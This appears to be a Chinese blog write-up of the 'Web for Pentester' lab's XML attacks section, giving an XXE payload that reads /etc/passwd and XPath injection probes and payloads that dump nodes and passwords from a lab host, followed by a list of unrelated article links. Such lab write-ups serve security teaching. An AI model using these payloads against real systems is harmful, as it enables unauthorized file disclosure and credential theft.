Web for pentester_writeup之XML attacks篇
2024-10-05 12:27:26
Web for pentester_writeup之XML attacks篇
XML attacks(XML攻击)
Example 1 - XML外部实体注入(XXE)
Payload
http://192.168.219.136/xml/example1.php?xml= <!DOCTYPE a[<!ENTITY b SYSTEM "file:///etc/passwd">]><c>%26b;</c>
Example 2 - Xpath注入
输入一个单引号,报错,分析报错信息发现xpath函数,猜测是xpath注入
<1> http://192.168.219.136/xml/example2.php?name=hacker' and '1' ='1
<2> http://192.168.219.136/xml/example2.php?name=hacker' and '1' ='2
<3> http://192.168.219.136/xml/example2.php?name=hacker' or '1' ='1
<4> http://192.168.219.136/xml/example2.php?name=hacker' or '1' ='2
可知XPath的代码为 [PARENT NODES]/name[.='[INPUT]']/[CHILD NODES]
Payload
http://192.168.219.136/xml/example2.php?name=' or 1=1]/parent::*/child::node()%00
http://192.168.219.136/xml/example2.php?name=hacker' or 1=1]/parent::*/password%00
最新文章
- empty和isset函数详解
- 第二章 spring
- Atitit &#160;图像处理底色变红的解决
- elasticsearch中的API
- iOS 阶段学习第七天笔记(函数、递归)
- Walkway.js – 用线条制作简约的 SVG 动画
- NFS服务器搭建
- 第1章 C#类型基础
- 天气预报接口api(中国天气网)
- Android显示GIF图片
- realmock 前后端分离方案
- 基于微博LBS API开发的周边美图android app
- NGUI_Toggle
- 计算机编码方式详解(Unicode、UTF-8、UTF-16、ASCII)
- 《SpringMVC从入门到放肆》十四、SpringMVC分组数据校验
- [看图说话]在VMware Workstation 9中安装Mac OS X 10.8 Mountain Lion
- 【疑难杂症】gdb调试多线程程序报错:interrupted system call
- python中合并数组的方法
- HDU 1542 Atlantis(线段树面积并)
- Android(我还是个菜鸟)——UI-开源框架ImageLoader的完美例子